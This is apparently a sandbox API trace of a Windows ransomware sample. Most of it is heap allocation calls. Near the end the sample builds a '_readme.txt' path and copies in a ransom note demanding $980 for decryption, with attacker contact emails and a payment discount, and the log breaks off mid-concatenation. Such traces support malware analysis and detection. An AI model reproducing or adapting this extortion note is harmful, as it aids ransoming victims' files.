(HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.538] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.538] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.539] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.540] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.540] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.541] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.541] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.542] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.542] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.543] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.543] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.544] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.544] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.544] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.544] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.544] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.544] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.544] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.544] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.544] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.544] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.544] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.544] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.544] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.544] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.544] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.544] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.544] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0165.544] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.544] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.544] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.544] PathFindFileNameW (pszPath="") returned="" [0165.544] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.545] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.545] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.545] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.545] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.545] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.545] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.545] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0165.545] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.545] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.545] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0165.545] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.546] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.546] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 